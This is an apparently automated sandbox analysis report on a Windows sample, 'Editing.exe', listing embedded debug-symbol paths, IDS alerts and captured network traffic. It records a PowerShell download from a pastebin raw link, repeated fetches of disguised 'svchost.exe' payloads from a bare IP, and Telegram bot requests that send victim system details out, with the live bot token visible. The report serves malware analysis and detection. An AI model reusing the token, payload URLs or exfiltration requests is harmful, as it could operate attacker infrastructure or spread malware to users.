Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Editing.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Editing.exe, 00000000.00000002.3211317727.0000024437D40000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211294592.0000024437D31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdb source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:51668 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:51881 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:51882 -> 149.154.167.220:443
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.6:51658 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected:
    GET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1
    Host: api.telegram.org
Source: global traffic | HTTP traffic detected:
    POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
    Host: api.telegram.org
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 136
Source: global traffic | HTTP traffic detected:
    POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
    Host: api.telegram.org
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 136
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: api.ipify.org
Source: global traffic | HTTP traffic detected:
    GET /json/8.46.123.189 HTTP/1.1
    Host: ip-api.com
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win64_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win32_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win64_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win32_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win32_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win64_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win32_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: global traffic | HTTP traffic detected:
    GET /TeamBuild/win64_svchost.exe HTTP/1.1
    Host: 89.23.97.214
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51663 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49778 -> 172.67.74.152:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51682 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51681 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51811 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51810 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51875 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51879 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51880 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51876 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49706 -> 104.20.3.235:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:51668 -> 149.154.167.220:443
Source: global traffic | HTTP traffic detected:
    GET /raw/WHKzW2nr HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214 (40 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
    Host: api.telegram.org
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 136
Source: Editing.exe | String found in binary or memory: http://.css
Source: Editing.exe | String found in binary or memory: http://.jpg
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exe
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32s
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/TeamBuild/win64_svchost.exe
Source: Editing.exe, 00000000.00000002.3211502508.000002443A87A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214:80/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org:80/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3211502508.000002443A8A2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org:443/
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://exslt.org/common
Source: Editing.exe | String found in binary or memory: http://html4/loose.dtd
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3211502508.000002443A80B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8
Source: Editing.exe, 00000000.00000002.3211502508.000002443A80B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com:80/
Source: Editing.exe, 00000000.00000003.2461137442.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2986571369.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198834558.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2460845546.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2728016609.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2985277080.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198606604.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198401533.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216305101.00000284D0B1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000002.00000002.2224756243.000002B11B271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2269834300.0000020A726D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2191077266.0000020A63AFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213329028.00000284CD5B0000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000002.00000002.2184575792.000002B10B428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3213329028.00000284CD5B0000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2184575792.000002B10B201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2191077266.0000020A62521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
